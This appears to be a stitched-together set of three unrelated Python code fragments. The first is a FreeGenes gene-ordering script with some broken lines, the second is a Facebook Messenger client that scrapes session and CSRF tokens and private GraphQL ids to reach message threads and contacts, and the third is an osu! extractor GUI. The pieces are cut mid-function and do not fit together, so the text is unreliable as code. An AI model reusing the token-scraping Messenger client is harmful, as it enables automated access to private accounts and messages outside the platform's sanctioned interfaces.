genbank_single.write(genbank_fixed)
json_data["sequence"]["optimized_sequence"] = new_sequence
with open(stage + "{}/{}.json".format(gene_id,gene_id),"w+") as json_file:
json.dump(json_data,json_file,indent=2)
print("Wrote new sequence for " + gene_id)
if input("Replace another sequence? Y or N : ").upper() == "Y":
new_gene_id = input("gene id : ")
return replace_bad_sequence(new_gene_id)
else:
order_fragment_to_order()
def order_reoptimize_fragment(gene_id):
json_data = Json_load(stage + "{}/{}.json".format(gene_id,gene_id))
table = codon.load_codon_table(taxonomy_id="custom_1", custom=True)
translation = Seq(json_data["sequence"]["optimized_sequence"], IUPAC.unambiguous_dna).translate()[:-1]
#translation = json_data["genbank"]["translation"]
new_sequence = fix_sequence(table,gene_id,codon.optimize_protein(table, translation) + "TGA")
if not Seq(json_data["sequence"]["optimized_sequence"], IUPAC.unambiguous_dna).translate() == Seq(new_sequence, IUPAC.unambiguous_dna).translate():
print("Bad translation, try again")
order_reoptimize_fragment(gene_id)
else:
with open(stage + "{}/{}.gb".format(gene_id,gene_id),"r") as genbank_single:
genbank_current = genbank_single.read()
genbank_fixed = replace_genbank_sequence(genbank_current, new_sequence)
with open(stage + "{}/{}.gb".format(gene_id,gene_id),"w+") as genbank_single:
genbank_single.write(genbank_fixed)
json_data["sequence"]["optimized_sequence"] = new_sequence
with open(stage + "{}/{}.json".format(gene_id,gene_id),"w+") as json_file:
json.dump(json_data,json_file,indent=2)
print("Wrote new sequence for " + gene_id)
def order_reset_fragment_stage():
for file in glob.glob(stage + "*/*.json"):
with open(file,"r") as json_file:
data = json.load(json_file)
data["sequence"]["fragment_sequences"] = {}
gene_id = data["gene_id"]
path = "{}{}".format(stage,gene_id)
with open("{}/{}.json".format(path,gene_id),"w+") as json_file:
json.dump(data,json_file,indent=2)
print("Fragments on stage cleared.")
def order_id_reset():
number_of_files = len(glob.glob(stage + "*"))
input("Are you sure you'd like to continue? (ENTER TO CONTINUE)")
original_number = config["ID_START"]
new_number = config["ID_START"] + number_of_files
config["ID_START"] = new_number
# Collection reset
config["LAST_COLLECTION"] = config["LAST_COLLECTION"] + 1
with open("./configuration/FreeGene_config.yaml","w+") as yaml_file:
yaml.dump(config,yaml_file,default_flow_style=False)
print("Replaced {} with {}. New collection number start is {}".format(original_number,new_number,config["LAST_COLLECTION"]))
def order_fragment_to_order():
print("Recreating database")
order_reset_fragment_stage()
order_fragment_genes()
order_write_link()
order_twist_order()
def order_manager():
print("\n")
print("=== FreeGenes Order manager ===")
options = ("Frag -> Order", "Set ID starting point", "Fragment genes in stage", "Write linkers to stage", "Create Twist submission spreadsheet", "Change part of sequence", "Reoptimize single fragment", "Reset fragment stage", "Clear ortho pairs","Bad seq removal", "Reurn to FG manager", "Exit")
choice = option_list(options)
if choice == "Frag -> Order":
order_fragment_to_order()
elif choice == "Set ID starting point":
order_id_reset()
elif choice == "Fragment genes in stage":
order_fragment_genes()
elif choice == "Write linkers to stage":
order_write_link()
elif choice == "Create Twist submission spreadsheet":
order_twist_order()
elif choice == "Change part of sequence":
replace_bad_sequence(input("gene_id : "))
elif choice == "Reoptimize single fragment":
reoptimize_fragment(input("gene_id : "))
elif choice == "Reset fragment stage":
order_reset_fragment_stage()
elif choice == "Bad seq removal":
order_bad_seq()
elif choice == "Reurn to FG manager":
return freegenes_manager()
elif choice == "Exit":
sys.exit()
elif choice == "Clear ortho pairs":
clear_pairs()
print("Returning to Order manager")
return order_manager()
order_manager()
### ===============
### ===============
### GENOME DIGESTER
### ===============
### ===============
def freegenes_digest():
## ===============
## SETUP VARIABLES
## ===============
date = datetime.date.today().strftime("%d") + "-" + datetime.date.today().strftime("%B")[:3].upper() + "-" + datetime.date.today().strftime("%Y")
stage = FreeGenes_configuration()["STAGE_PATH"]
NextCollection = NextCollection()
unused = set()
prefix_genbank = """LOCUS {} {} bp ds-DNA linear BCT {}
DEFINITION {}
ACCESSION .
VERSION .
KEYWORDS .
REFERENCE 1 (bases 1 to {})
SOURCE synthetic DNA sequence
ORGANISM {}
AUTHORS {}
TITLE Direct Submission
FEATURES Location/Qualifiers
CDS {}"""
important_tags = important_tags
for file in glob.glob("./../pipeline/template.json"):
with open(file,"r") as template_json:
template = json.load(template_json)
## ================
## Digest functions
## ================
# Process a string of important values into a dictionary
def dictionary_builder(tag_list, string):
return {key: value for (key, value) in map(lambda tag: [tag, ''.join(re.findall(r'/{}=\"([A-Za-z0-9:_./-_\s-]+)\"'.format(tag),string))], tag_list)}
# Build dictionary into genbank compatible format
def dictionary_to_genbank(dictionary):
value_list = []
for key, value in dictionary.items():
if type(value) == type(""):
value_list.append(str(key + "=" + '"' + value + '"'))
return value_list
def genbank_multiline(genbank_list):
multiline= ''
for item in genbank_list:
split_list = textwrap.wrap(item, width=58)
for item in split_list:
multiline = multiline + " " + "/" + item + "\n"
return multiline#.rstrip()
def fasta_refseq_dictionary(file_name):
dictionary = {}
for record in SeqIO.parse(file_name, "fasta"):
dictionary[record.id[:14]] = str(record.seq)
return dictionary
def genelist_to_list(file_name):
with open(file_name,"r") as data_file:
data = data_file.read()
essential = list(filter(None, data.split("\n")))
return essential
## ==================
## Ask for user input
## ==================
path = FreeGenes_configuration()["PROJECT_PATH"]
print("Please choose a genome file")
genome = file_list(path + "genome/genome_sequences/*.gb")
print("Please choose configuration file")
digest_configuration = file_list(path + "genome/digestion_configuration/*.yaml")
config = load_configuration(digest_configuration)
transl_table = ' /transl_table='+str(config["transl_table"])
## =====================================
## Check for protein files or gene lists
## =====================================
if config["protein_file"]:
protein_fasta = file_list(path + "genome/protein_lists/*.fasta")
protein_dictionary = fasta_refseq_dictionary(protein_fasta)
if config["gene_list"]:
essential_list = file_list(path + "genome/gene_lists/*.txt")
essential_list = genelist_to_list(essential_list)
## ========================
## Process Genbank into CSV
## ========================
df = genbank_to_csv(genome)
## ================
## Digest the table
## ================
for index, row in df.iterrows():
string = row["description"]
sequence = row["sequence"]
data = (dictionary_builder(important_tags, string))
references = (re.findall(r'(db_xref=\"[A-Za-z0-9:_/-_\s-]+\")',string))
data["references"] = references
# Genbank stuff
multiline = (genbank_multiline(dictionary_to_genbank(data)) + transl_table + "\n" + " /codon_start=1" + "\n" + genbank_multiline(references))
if not data["gene"] == "":
definition = data["gene"]
else:
definition = data["locus_tag"]
# Get gene_id and collection id
gene_id = NextID()
write = True
# Essential checker
if config["gene_list"]:
if data["gene"] in essential_list or data["locus_tag"] in essential_list:
write = True
else:
write = False
unused.add(definition)
# Protein file checker
if config["protein_file"]:
ref = data["protein_id"]
if ref:
write = True
data["translation"] = protein_dictionary[data["protein_id"]]
print("Changed translation on " + gene_id)
else:
write = False
# Setup database links
links = []
# Setup Genbank file prefix
genbank_file | |
NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36""")
if homepage is None or homepage == "":
raise Exception("Get userid failed.")
self.homepage = homepage
# {"USER_ID":"100027859862248","ACCOUNT_ID":"100027859862248","NAME":"<NAME>","SHORT_NAME":"<NAME>","IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false}
succ, self._userid = helper_str.substringif(
homepage, 'USER_ID":"', '"')
if not succ or self._userid is None or self._userid == "":
raise Exception("Get userid failed")
if self._username is None or self._username == "":
succ, username = helper_str.substringif(
homepage, 'NAME":"', '')
if succ and not self._username is None and not self._username == "":
self._username = username
# "async_get_token":"Adz9YM4ErUVi1H0azTmDnBX6Md_LsWwifZoVLsZMMIUakA:<KEY>"}
succ, self.fb_dtsg_ag = helper_str.substringif(
homepage, 'async_get_token":"', '"')
if not succ or self.fb_dtsg_ag is None or self.fb_dtsg_ag == "":
raise Exception("fb_dtsg_ag not found")
# "__spin_r":4206568,
succ, self._spin_r = helper_str.substringif(
homepage, '__spin_r":', ',')
if not succ or self._spin_r is None or self._spin_r == "":
raise Exception("__spin_r not found. account may be locked")
# "__spin_r":4206568,"__spin_b":"trunk","__spin_t":1534242344,
succ, self._spin_t = helper_str.substringif(
homepage, '__spin_t":', ',')
if not succ or self._spin_t is None or self._spin_t == "":
raise Exception("__spin_t not found")
succ, self._spin_b = helper_str.substringif(
homepage, '__spin_b":', ',')
if not succ or self._spin_b is None or self._spin_b == "":
raise Exception("__spin_b not found")
self._spin_b = self._spin_b.strip().strip('"')
# "hsi":"6746747510353494316-0"
succ, self.hsi = helper_str.substringif(homepage, '"hsi":"', '"')
if not succ or self.hsi is None or self.hsi == "":
raise Exception("hsi not found")
# {"name":"fb_dtsg","value":"AQHRzELKyYTl:AQFKH4XWkHlv"}
succ, self.fb_dtsg = helper_str.substringif(homepage, '"name":"fb_dtsg","value":"', '"')
if not succ or self.fb_dtsg is None or self.fb_dtsg == "":
raise Exception("fb_dtsg not found")
# {"name":"jazoest","value":"22097"}
succ, self.jazoest = helper_str.substringif(
homepage, '"name":"jazoest","value":"', '"')
if not succ or self.jazoest is None or self.jazoest == "":
raise Exception("jazoest not found")
# 没有QuicklingConfig
# ,"pkg_cohort":"EXP2:comet_pkg","
succ, self._pc = helper_str.substringif(
homepage, '"pkg_cohort":"', '"')
if not succ or self._pc is None or self._pc == "":
raise Exception("_pc not found")
# "client_revision":1003006555,
succ, self._rev = helper_str.substringif(
homepage, '"client_revision":', ',')
if not succ or self._rev is None or self._rev == "":
raise Exception("_rev not found")
# 获取个人主页地址
html, redir = self._ha.getstring_unredirect('https://www.facebook.com/me',
headers="""
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
accept-encoding: gzip, deflate
accept-language: en-US,en;q=0.9
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36"""
)
if redir is None or redir == "":
raise Exception("进入个人主页失败")
self._host = redir
# 进入messenger页面(通过facebook的cookie进入,如果不是,url需要改)
# "deviceId":"39f79811-b3a7-447e-8483-7d2f59e35915","schemaVersion":"3696807697038235",
re_params = re.compile(r'"deviceId":"(.*?)","schemaVersion":"(.*?)",')
# {"epochId":"6754309714097997511"},5634]
re_epochid = re.compile(r'"epochId":"(.*?)"}')
# "fbid":"100054477585089","appID":219994525426954,
re_aid = re.compile(r'"fbid":".*?","appID":(.*?),')
# {"app_id":"772021112871879"}
re_appid = re.compile(r'\{"app_id":"(\d+)"\}')
url = 'https://www.facebook.com/messages'
html = self._ha.getstring(url, headers='''
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
accept-encoding: gzip, deflate
accept-language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
''')
m = re.search(re_params, html)
if m is None:
raise Exception("进入messenger页面失败")
self.device_id = m.group(1)
self.schema_version = m.group(2)
# epoch_id
m = re.search(re_epochid, html)
if m is None:
raise Exception("epoch id not found")
self.epoch_id = m.group(1)
# aid
m = re.search(re_aid, html)
if m is None:
raise Exception('aid not found')
self.aid = m.group(1)
# app_id
m = re.search(re_appid, html)
if m is None:
raise Exception("app id not found")
self.appid = m.group(1)
# if 'lightspeed_web_initial_sync_v2' in html:
# re_respnse_js = re.compile(r'"lightspeed_web_initial_sync_v2":\{.*?"response":\[("function.*?),\s*"function.*?\]\}\}\}')
# m = re_respnse_js.search(html)
# if m is None:
# raise Exception("Get js function fail")
# js_func = m.group(1)
# if js_func is None or js_func == '':
# raise Exception("Get js function fail")
# res = self._parse_init_js(js_func)
# if not res:
# raise Exception("处理初始消息js失败")
succ = True
msg = "Refresh neccessary fields succeed."
except Exception:
self._logger.error(
"Refresh neccessary fields from homepage error, taskid:%s\nphone:%s\nex:%s"
% (self.task.taskid, self.phone, traceback.format_exc()))
succ = False
msg = "Refresh neccessary fields failed."
return (succ, msg)
def _access_profile(self) -> (bool, str):
"""access simple profile"""
try:
url = "https://www.facebook.com/"
html = self._ha.getstring(
url,
headers="""
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
accept-encoding: gzip, deflate
accept-language: en-US,en;q=0.9
cache-control: no-cache
content-type: application/x-www-form-urlencoded
pragma: no-cache
sec-fetch-mode: cors
sec-fetch-site: same-origin
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"""
)
if html is None or html == "":
raise Exception("Get profile page failed.")
# {"USER_ID":"100027859862248","ACCOUNT_ID":"100027859862248",
# "NAME":"<NAME>","SHORT_NAME":"<NAME>","IS_MESSENGER_ON
# LY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false}
succ, self._userid = helper_str.substringif(
html, 'USER_ID":"', '"')
if not succ or self._userid is None or self._userid == "":
succ, self._userid = helper_str.substringif(
html, 'user_id:"', '"')
if not succ or self._username is None or self._username == "":
msg = "访问个人信息失败"
return (succ, msg)
succ, self._username = helper_str.substringif(html, 'NAME":"', '"')
if not succ or self._username is None or self._username == "":
succ, self._username = helper_str.substringif(
html, 'name:"', '"')
if not succ or self._username is None or self._username == "":
msg = "访问个人信息失败"
return (succ, msg)
succ, self.is_messenger_only_user = helper_str.substringif(
html, 'IS_MESSENGER_ONLY_USER":', ',')
if succ and not self.is_messenger_only_user is None:
if self.is_messenger_only_user == "false":
self.is_messenger_only_user = False
else:
self.is_messenger_only_user = True
succ, self.is_deactived_allowed_on_messenger = helper_str.substringif(
html, 'IS_DEACTIVATED_ALLOWED_ON_MESSENGER":', ',')
if succ and not self.is_deactived_allowed_on_messenger is None:
if self.is_deactived_allowed_on_messenger == "false":
self.is_deactived_allowed_on_messenger = False
else:
self.is_deactived_allowed_on_messenger = True
succ = True
msg = "访问个人信息成功"
except Exception:
self._logger.error(
"Access profile error:%s" % traceback.format_exc())
succ = False
msg = "访问个人信息失败"
return (succ, msg)
def _get_js_resources(self) -> iter:
"""下载并迭代返回所有页面里的js资源,用于查找各种docid..."""
try:
with self._jspages_locker:
if self._jspages_listpage is None:
# 拿资源列表页面
url = (
'https://www.facebook.com/ajax/bootloader-endpoint/?' +
'modules=NotificationList.react%2CNotificationJewelL' +
'ist.react%2CNotificationAsyncWrapper%2CNotification' +
'Store%2CNotificationJewelController%2CMercuryJewel%' +
'2CMercuryThreadInformer%2CMessengerState.bs%2CMesse' +
'ngerGraphQLThreadlistFetcher.bs%2CMercuryServerRequ' +
'ests%2CMercuryJewelUnreadCount.bs&' + '__user=' +
parse.quote_plus(self._userid) + '&__a=1&' + '__req=' +
self._req.get_next() + '&__be=1&' +
'__pc=PHASED%3Aufi_home_page_pkg&dpr=1&' + '__rev=' +
parse.quote_plus(self._rev) + '&fb_dtsg_ag=' +
parse.quote_plus(self.fb_dtsg_ag) + '&jazoest=' +
self.jazoest + '&__spin_r=' + parse.quote_plus(
self._spin_r) + '&__spin_b=' + parse.quote_plus(
self._spin_b) + '&__spin_t=' +
parse.quote_plus(self._spin_t))
html = self._ha.getstring(
url,
headers="""
accept: */*
accept-encoding: gzip, deflate
accept-language: zh-CN,zh;q=0.9
referer: https://www.facebook.com/""")
if not isinstance(html, str) or html == "":
self._logger.error("Get docid js pages failed.")
return
self._jspages_listpage = html
if len(self._jspages_itemurls) < 1:
# 解析资源列表页面
matches = MessengerLogin.re_js_resoures.findall(html)
if matches is None or not any(matches):
raise Exception("Get js resources failed.")
for m in matches:
try:
if len(m) != 2:
continue
n = m[0]
u = m[1]
u = u.replace('\\', '')
if not self._jspages_itemurls.__contains__(n):
self._jspages_itemurls[n] = u
except Exception:
self._logger.trace(
"Get docid for contact parse item url error: {} {}"
.format(m, traceback.format_exc()))
self._logger.info(
"Got js resources list, {} count={}".format(
self.uname_str, len(self._jspages_itemurls)))
# fbcookie = self._ha._managedCookie.get_cookie_for_domain(
# "https://www.facebook.com/")
# self._ha._managedCookie.add_cookies(uridocid.netloc, fbcookie)
for jsurl in self._jspages_itemurls.items():
try:
if self._jspages.__contains__(jsurl[0]):
yield self._jspages[jsurl[0]]
else:
jspage = self._ha.getstring(
jsurl[1],
headers="""
Origin: https://www.facebook.com
Referer: https://www.facebook.com/""")
self._jspages[jsurl[0]] = (jsurl[1], jspage)
self._logger.debug("Got js resource: {} {}".format(
self.uname_str, jsurl[1]))
yield self._jspages[jsurl[0]]
except Exception:
self._logger.error(
"Download js resources error: {} {}".format(
self.uname_str, traceback.format_exc()))
except Exception:
self._logger.error("Get js resources error: {} {}".format(
self.uname_str, traceback.format_exc()))
#######################################
def _get_js_v1(self) -> iter:
try:
html = self._ha.getstring('https://www.facebook.com',
headers="""
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
accept-encoding: gzip, deflate
accept-language: en-US,en;q=0.9
cache-control: no-cache
content-type: application/x-www-form-urlencoded
pragma: no-cache
sec-fetch-mode: cors
sec-fetch-site: same-origin
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"""
)
# 先取script src直接能拿到部分
ehtml = etree.HTML(html)
src_list = ehtml.xpath('//script/@src')
self._logger.info(
"Got js resources list count={}".format(len(src_list)))
for jsurl in src_list:
if jsurl.startswith('https://'):
js = self._ha.getstring(jsurl, headers='''
Origin: https://www.facebook.com
Referer: https://www.facebook.com/
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36''')
yield js
except Exception:
self._logger.error(
"Get js src error: {}".format(traceback.format_exc()))
def _get_docid_init(self) -> bool:
""""""
if self.docid_init is not None:
return True
res: bool = False
try:
# LSGraphqlInitialSyncQuery
for js in self._get_js_v1():
try:
if helper_str.is_none_or_empty(js) or 'LSGraphqlInitialSyncQuery' not in js:
continue
m = MessengerLogin._re_docid_LSGraphqlInitialSyncQuery.search(js)
if m is not None:
m_docid = re.search(r'id:\s*?"(\d+)"', m.group(1))
if m_docid is not None:
self.docid_init = m_docid.group(1)
res = True
break
except Exception:
self._logger.debug(
"Parse init message docid error: {}".format(traceback.format_exc()))
except Exception:
self._logger.error(
"Get docid for init message error: {} {}".format(
self.uname_str, traceback.format_exc()))
return res
def _parse_init_js(self, js_func) -> iter:
"""处理初始消息js, 包含联系人、第一条发送消息等信息"""
res = False
try:
re_js_seq = re.search(r'return LS.seq\(\[(.*?)\]\)\}', js_func)
if re_js_seq is None:
self._logger.error('处理js代码失败')
req_js = re_js_seq.group(1)
re_js_sp = re.compile(r'_=>LS.sp\((.*?)\)')
m = re_js_sp.findall(req_js)
if m is None:
self._logger.error('处理js代码失败')
for js_one in m:
param_list = self._parse_js_one_v1(js_one)
dict_one = dict()
if param_list[0] == '"396"':
self.last_applied_cursor = param_list[4][1:-1]
# LSMailboxDeleteThenInsertThreadStoredProcedure
# 聊天通道
elif param_list[0] == '"130"':
dict_one['type'] = 'threads'
dict_one['thread_id'] = self.J(self._parse_n(param_list[8]))
self.messenger_thread_id.append(dict_one['thread_id'])
# function c(a) {
# if (b("bs_caml_int64").eq(a, b("MessagingThreadType.bs").group) || b("bs_caml_int64").eq(a, b("MessagingThreadType.bs").tincanGroupDisappearing))
# return !0;
| |
# Internal
import os
import subprocess
from sys import exit
from tkinter import *
from tkinter import filedialog
from tkinter import messagebox
import tkinter.ttk as ttk
import webbrowser
# User lib
from osu_extractor.GetData import getSubFolder, getAllItemsInFolder, getFolderName, extractFiles, createPathIfNotExist, keepCertainListByKeyword, getFileTypeListInFolder
from osu_extractor.Public import jsonHandler, version
# Local
dir_path = os.path.dirname(os.path.realpath(__file__))
def OpenUrl(url):
webbrowser.open_new(url)
def startfile(filename, dontCreateIfNotExist=False):
"""
Open a folder or file in the default application.
"""
if not dontCreateIfNotExist:
createPathIfNotExist(filename)
try:
os.startfile(filename)
except FileNotFoundError:
messagebox.showerror("Error", "Cannot find the file specified.")
except Exception:
try:
subprocess.Popen(["xdg-open", filename])
except FileNotFoundError:
messagebox.showerror("Error", "Cannot find the file specified.")
except Exception as e:
messagebox.showerror("Error", str(e))
class CreateToolTip(object):
"""
create a tooltip for a given widget
"""
def __init__(self, widget, text="widget info", delay=250, wraplength=180, opacity=1.0, always_on_top=True):
self.waittime = delay # miliseconds
self.wraplength = wraplength # pixels
self.widget = widget
self.text = text
self.opacity = opacity
self.always_on_top = always_on_top
self.widget.bind("<Enter>", self.enter)
self.widget.bind("<Leave>", self.leave)
self.widget.bind("<ButtonPress>", self.leave)
self.id = None
self.tw = None
def enter(self, event=None):
self.schedule()
def leave(self, event=None):
self.unschedule()
self.hidetip()
def schedule(self):
self.unschedule()
self.id = self.widget.after(self.waittime, self.showtip)
def unschedule(self):
id = self.id
self.id = None
if id:
self.widget.after_cancel(id)
def showtip(self, event=None):
x = y = 0
x, y, cx, cy = self.widget.bbox("insert")
x += self.widget.winfo_rootx() + 25
y += self.widget.winfo_rooty() + 20
# creates a toplevel window
self.tw = Toplevel(self.widget)
# Make it stay on top
self.tw.wm_attributes("-topmost", self.always_on_top)
# Make it a little transparent
self.tw.wm_attributes("-alpha", self.opacity)
# Leaves only the label and removes the app window
self.tw.wm_overrideredirect(True)
self.tw.wm_geometry("+%d+%d" % (x, y))
label = Label(self.tw, text=self.text, justify="left", background="#ffffff", relief="solid", borderwidth=1, wraplength=self.wraplength)
label.pack(ipadx=1)
def hidetip(self):
tw = self.tw
self.tw = None
if tw:
tw.destroy()
class Main:
def __init__(self):
# Create the main window
self.root = Tk()
self.root.title("Osu! Extractor V" + version)
self.root.geometry("900x600")
self.root.protocol("WM_DELETE_WINDOW", self.on_Closing)
# Create the menu
self.menubar = Menu(self.root)
self.file_menu = Menu(self.menubar, tearoff=0)
self.file_menu.add_checkbutton(label="Always on Top", command=self.always_On_Top)
self.file_menu.add_separator()
self.file_menu.add_command(label="Exit Application", command=self.on_Closing)
self.menubar.add_cascade(label="Options", menu=self.file_menu)
self.file_menu2 = Menu(self.menubar, tearoff=0)
self.file_menu2.add_command(label="Osu!.exe", command=lambda: self.openOsu())
self.file_menu2.add_command(label="Osu! folder", command=lambda: startfile(self.config["osu_path"], True))
# add output menu for each output type, nested
self.output_menu = Menu(self.file_menu2, tearoff=0)
self.output_menu.add_command(label="Song", command=lambda: startfile(self.getOutputPath(self.config["output_path"]["song"], "song")))
self.output_menu.add_command(label="Image", command=lambda: startfile(self.getOutputPath(self.config["output_path"]["img"], "img")))
self.output_menu.add_command(label="Video", command=lambda: startfile(self.getOutputPath(self.config["output_path"]["video"], "video")))
self.output_menu.add_command(label="Custom", command=lambda: startfile(self.getOutputPath(self.config["output_path"]["custom"], "custom")))
self.file_menu2.add_cascade(label="Output", menu=self.output_menu)
self.menubar.add_cascade(label="Open", menu=self.file_menu2)
self.file_menu3 = Menu(self.menubar, tearoff=0)
self.file_menu3.add_command(label="Tutorial", command=self.tutorial)
self.file_menu3.add_command(label="About", command=self.about)
self.file_menu3.add_separator()
self.file_menu3.add_command(label="Open Repository", command=lambda aurl="https://github.com/Dadangdut33/Osu-Extractor": OpenUrl(aurl))
self.menubar.add_cascade(label="Help", menu=self.file_menu3)
self.root.config(menu=self.menubar)
self.root.bind("<F1>", self.about)
# First read the config file
status, data = jsonHandler.loadSetting()
if status == False: # No config file
statusDefault, dataDefault = jsonHandler.setDefault()
if statusDefault == False:
messagebox.showerror("Error", "Fail to create default setting file! Please check the folder permission. Error details " + str(data))
exit(1)
else:
messagebox.showinfo("Info", "Settings file not found! Default setting file has been created and aplied!")
self.config = jsonHandler.default_Setting
else:
self.config = data
# Frames
# 1
self.frame_1 = LabelFrame(self.root, text="Settings", padx=5, pady=5, font="TkDefaultFont 10 bold")
self.frame_1.pack(side=TOP, fill=X, expand=False, padx=5, pady=5)
self.frame_1_row_1 = Frame(self.frame_1)
self.frame_1_row_1.pack(side=TOP, fill=X, expand=False)
self.frame_1_row_2 = Frame(self.frame_1)
self.frame_1_row_2.pack(side=TOP, fill=X, expand=False)
self.frame_1_row_3 = Frame(self.frame_1)
self.frame_1_row_3.pack(side=TOP, fill=X, expand=False)
self.frame_1_row_4 = Frame(self.frame_1)
self.frame_1_row_4.pack(side=TOP, fill=X, expand=False)
self.frame_1_row_5 = Frame(self.frame_1)
self.frame_1_row_5.pack(side=TOP, fill=X, expand=False)
# 2
self.frame_2 = LabelFrame(self.root, text="Output", padx=5, pady=5, font="TkDefaultFont 10 bold")
self.frame_2.pack(side=TOP, fill=BOTH, expand=TRUE, padx=5, pady=5)
self.frame_2_row_1 = Frame(self.frame_2)
self.frame_2_row_1.pack(side=TOP, fill=X, expand=False)
self.frame_2_row_2 = Frame(self.frame_2)
self.frame_2_row_2.pack(side=TOP, fill=X, expand=False)
self.frame_2_row_3 = Frame(self.frame_2) # TABLE
self.frame_2_row_3.pack(side=TOP, fill=BOTH, expand=TRUE)
# 3
self.frame_3 = Frame(self.root)
self.frame_3.pack(side=BOTTOM, fill=X, expand=False, padx=5, pady=5)
self.frame_3_row_1 = Frame(self.frame_3)
self.frame_3_row_1.pack(side=TOP, fill=X, expand=False)
# Content
# 1
self.label_OsuPath = Label(self.frame_1_row_1, text="Osu! Path")
self.label_OsuPath.pack(side=LEFT, padx=5, pady=5)
CreateToolTip(self.label_OsuPath, "Osu game directory")
self.entry_OsuPath = ttk.Entry(self.frame_1_row_1, width=50)
self.entry_OsuPath.pack(side=LEFT, padx=5, pady=5, expand=True, fill=X)
self.entry_OsuPath.bind("<Key>", lambda event: self.allowedKey(event)) # Disable input
CreateToolTip(self.entry_OsuPath, "Osu game directory")
self.browse_OsuPath = ttk.Button(self.frame_1_row_1, text="Browse", command=lambda: self.browseOsu())
self.browse_OsuPath.pack(side=LEFT, padx=5, pady=5)
self.varExtractSong = BooleanVar()
self.varExtractSong.set(self.config["default_extract"]["song"])
self.checkExtractSong = ttk.Checkbutton(self.frame_1_row_2, text="Extract Song (.mp3)", variable=self.varExtractSong)
self.checkExtractSong.pack(side=LEFT, padx=5, pady=5)
CreateToolTip(self.checkExtractSong, "Extract song to output folder")
self.entryExtractSong = ttk.Entry(self.frame_1_row_2, width=16)
self.entryExtractSong.pack(side=LEFT, padx=5, pady=5, fill=X, expand=True)
CreateToolTip(self.entryExtractSong, "Right Click to change output path of extracted song")
self.entryExtractSong.bind("<Key>", lambda event: self.allowedKey(event)) # Disable input
self.entryExtractSong.bind("<Button-3>", lambda event: self.browseOutputPath("song", self.entryExtractSong))
self.varExtractImage = BooleanVar()
self.varExtractImage.set(self.config["default_extract"]["img"])
self.checkExtractImage = ttk.Checkbutton(self.frame_1_row_2, text="Extract Image (.jpg)", variable=self.varExtractImage)
self.checkExtractImage.pack(side=LEFT, padx=5, pady=5)
CreateToolTip(self.checkExtractImage, "Extract image to output folder")
self.entryExtractImage = ttk.Entry(self.frame_1_row_2, width=15)
self.entryExtractImage.pack(side=LEFT, padx=5, pady=5, fill=X, expand=True)
CreateToolTip(self.entryExtractImage, "Right Click to change output path of extracted image")
self.entryExtractImage.bind("<Key>", lambda event: self.allowedKey(event)) # Disable input
self.entryExtractImage.bind("<Button-3>", lambda event: self.browseOutputPath("img", self.entryExtractImage))
self.varExtractVideo = BooleanVar()
self.varExtractVideo.set(self.config["default_extract"]["video"])
self.checkExtractVideo = ttk.Checkbutton(self.frame_1_row_3, text="Extract Video (.avi)", variable=self.varExtractVideo)
self.checkExtractVideo.pack(side=LEFT, padx=(5, 11), pady=5)
CreateToolTip(self.checkExtractVideo, "Extract video to output folder")
self.entryExtractVideo = ttk.Entry(self.frame_1_row_3, width=12)
self.entryExtractVideo.pack(side=LEFT, padx=5, pady=5, fill=X, expand=True)
self.entryExtractVideo.bind("<Key>", lambda event: self.allowedKey(event)) # Disable input
CreateToolTip(self.entryExtractVideo, "Right Click to change output path of extracted video")
self.entryExtractVideo.bind("<Button-3>", lambda event: self.browseOutputPath("video", self.entryExtractVideo))
self.varExtractCustom = BooleanVar()
self.varExtractCustom.set(self.config["default_extract"]["custom"])
self.checkExtractCustom = ttk.Checkbutton(self.frame_1_row_3, text="Extract Custom", variable=self.varExtractCustom, command=lambda: self.toggleExtractCustom())
self.checkExtractCustom.pack(side=LEFT, padx=5, pady=5)
CreateToolTip(self.checkExtractCustom, "Extract custom lists provided to output folder")
self.entryExtractCustom = ttk.Entry(self.frame_1_row_3, width=15)
self.entryExtractCustom.pack(side=LEFT, padx=5, pady=5, fill=X, expand=True)
self.entryExtractCustom.bind("<Key>", lambda event: self.allowedKey(event)) # Disable input
CreateToolTip(self.entryExtractCustom, "Right Click to change output path of extracted custom list")
# Custom list entry
self.label_CustomList = Label(self.frame_1_row_4, text="Custom List")
self.label_CustomList.pack(side=LEFT, padx=(5, 3), pady=5)
CreateToolTip(self.label_CustomList, "Custom file type extract. Input the file format with dot and separated by space, ex: .png .wav")
self.entry_CustomList = ttk.Entry(self.frame_1_row_4, width=30)
self.entry_CustomList.pack(side=LEFT, padx=(0, 5), pady=5, fill=X, expand=True)
CreateToolTip(self.entry_CustomList, "Custom file type extract. Input the file format with dot and separated by space, ex: .png .wav")
# Save, cancel, set default btn
